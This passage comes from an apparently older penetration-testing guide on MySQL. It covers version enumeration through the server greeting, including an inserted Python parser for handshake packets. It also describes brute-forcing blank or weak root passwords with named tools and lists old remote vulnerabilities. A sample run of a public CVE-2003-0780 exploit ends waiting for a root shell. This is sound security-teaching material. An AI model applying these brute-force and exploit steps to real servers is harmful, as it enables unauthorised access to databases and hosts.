8.11 MySQL

MySQL is commonly found running on TCP port 3306 on Linux and FreeBSD servers. The database is relatively straightforward to administer, with a much simpler access model than the heavyweight, but more scalable, Oracle.

8.11.1 MySQL Enumeration

The version of the target MySQL database can be gleaned by connecting to port 3306 with nc or telnet and reading the greeting string the server sends, as shown here:

# telnet 3306

Connected to
Escape character is '^]'.

Connection closed by foreign host.

The version of MySQL in this case is 3.23.52. If the server has been configured with a strict list of client systems defined, you will see a response like this:

# telnet db.example.org 3306

Connected to db.example.org.
Escape character is '^]'.
PHost 'cyberforce.segfault.net' is not allowed to connect to this MySQL server
Connection closed by foreign host.
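The greeting shown in the two telnet sessions above is a regular MySQL packet, so it can be decoded rather than eyeballed. The following Python is an added example (not from the book): it parses the server greeting into either a version string or the "not allowed to connect" error, which is useful for inventorying the MySQL versions on your own network. The packet bytes are constructed sample data shaped like the sessions above; the function and sample names are my own.

```python
import socket
import struct


def parse_mysql_greeting(data: bytes) -> dict:
    """Decode the first packet a MySQL server sends after the TCP connect.

    Every MySQL packet is a 3-byte little-endian payload length, a 1-byte
    sequence number, then the payload. The greeting payload is a handshake
    (protocol version byte, then a NUL-terminated server version string) or,
    when the client host is not permitted, an error packet (0xFF, a 2-byte
    error code, then the message text).
    """
    if len(data) < 5:
        raise ValueError("packet too short to hold a MySQL header")
    length = data[0] | (data[1] << 8) | (data[2] << 16)
    payload = data[4:4 + length]
    if len(payload) < length:
        raise ValueError("truncated MySQL packet")
    if payload[0] == 0xFF:
        code = struct.unpack_from("<H", payload, 1)[0]
        msg = payload[3:]
        if msg[:1] == b"#":  # 4.1+ servers prefix '#' plus a 5-char SQLSTATE
            msg = msg[6:]
        return {"kind": "error", "code": code, "message": msg.decode("latin-1")}
    end = payload.index(b"\x00", 1)  # server version string is NUL-terminated
    return {"kind": "handshake", "protocol": payload[0],
            "version": payload[1:end].decode("ascii", "replace")}


def grab_mysql_banner(host: str, port: int = 3306, timeout: float = 5.0) -> dict:
    """Connect to host:port and decode whatever greeting the server sends."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return parse_mysql_greeting(sock.recv(1024))


def _packet(payload: bytes, seq: int = 0) -> bytes:
    """Wrap a payload in the 4-byte MySQL packet header (for constructed samples)."""
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


# Constructed sample: a 3.23.52 handshake (protocol 10, connection id, 8-byte
# scramble, filler byte, capability flags, padding).
SAMPLE_HANDSHAKE = _packet(b"\x0a" + b"3.23.52\x00" + struct.pack("<I", 7)
                           + b"Zh8Tpq3w" + b"\x00" + struct.pack("<H", 0x002C)
                           + b"\x00" * 13)

# Constructed sample: the error (ER_HOST_NOT_PRIVILEGED, code 1130) a server
# with a strict client-host list returns instead of a handshake.
SAMPLE_DENIED = _packet(b"\xff" + struct.pack("<H", 1130)
                        + b"Host 'cyberforce.segfault.net' is not allowed "
                        + b"to connect to this MySQL server")
```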

8.11.2 MySQL Brute Force

By default, the MySQL database accepts user logins as root with no password. A simple Unix-based utility called finger_mysql is useful for testing network blocks for MySQL instances that accept a blank root password, available in source form at http://www.securiteam.com/tools/6Y00L0U5PC.html.

Usefully, when the tool compromises the database, it lists the users and their password hashes from the mysql.user table. There are a number of tools in the Packet Storm archive that can be used to crack these hashes.

If a blank root password doesn't provide access, the Hydra utility can be used to launch a parallel MySQL brute-force attack.

MetaCoretex can also assess MySQL instances efficiently, both by brute-force password grinding and by checking the database configuration. If you are responsible for the security of database services, I highly recommend that you use MetaCoretex to provide assurances relating to remote attack.

8.11.3 MySQL Process-Manipulation Vulnerabilities

At the time of writing, the ISS X-Force database (http://xforce.iss.net) lists a number of serious, remotely exploitable vulnerabilities in MySQL (i.e., excluding issues that require authentication and denial-of-service bugs), as shown in Table 8-7.

Table 8-7. Serious remotely exploitable MySQL vulnerabilities

MySQL 4.x and prior mysql_real_connect() overflow
MySQL 3.23.53a and prior along with 4.0.5a and prior COM_CHANGE_USER password overflow
MySQL 3.23.53a and prior along with 4.0.5a and prior COM_CHANGE_USER authentication bypass
MySQL 3.22.33 and prior crafted client hostname overflow
MySQL 3.22.32 and prior unauthenticated remote access vulnerability

A recent vulnerability that isn't listed in the ISS X-Force database at the time of writing is CVE-2003-0780, a remote vulnerability in MySQL 3.23.56 and 4.0.15 and prior. An exploit for this issue is available at http://packetstormsecurity.org/0309-exploits/09.14.mysql.c.

Example 8-20 shows the exploit script in use against a vulnerable MySQL server, providing root access to the operating system. For exploit usage and options, simply run the tool with no arguments.

Example 8-20. Using the CVE-2003-0780 exploit against MySQL

# ./mysql -d -p "" -t 1

#  Mysql 3.23.x/4.0.x remote exploit(2003/09/12)  #
@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @

[+] Connecting to mysql server
[+] ALTER user column...ok
[+] Select a valid user...ok
[+] Found a user:test
[+] Password length:480
[+] Modified password...ok
[+] Finding client socket......ok
[+] socketfd:3
[+] Overflow server....ok
[+] sending OOB.......ok
[+] Waiting a shell.....